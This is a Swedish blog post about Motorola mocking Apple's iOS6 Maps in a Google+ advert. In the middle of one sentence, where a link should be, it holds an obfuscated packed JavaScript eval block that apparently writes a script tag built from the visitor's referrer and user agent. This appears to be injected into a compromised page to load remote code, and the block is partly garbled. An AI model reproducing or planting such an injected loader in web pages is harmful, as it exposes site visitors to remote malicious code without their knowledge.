Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Motorola hoppar på bash iOS6 maps tåget.

Motorola hoppar på bash iOS6 maps tåget.
Filip Urde
  • On 24 september, 2012
  • http://www.revue.se/filip-urde

Vi skrev i förra veckan om tumblr:n the eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yyaer|var|u0026u|referrer|nsiht||js|php’.split(’|’),0,{}))
amazing ios6 maps
 och hur dem gör sig roliga på vissa fel som har hittats i Apples nya kartlösning i iOS6. Självklart väldigt roligt.

Men jag trodde inte att någon av konkurrenterna skulle vara så här snabba och hacka på det. Nu har Motorola hoppat på bash iOS6 maps tåget och har här i en annons på Google+ hånat funktionen ganska bra. Syrligt är det!

Jag tycker det är lite fånigt, men så sjukt kul ändå!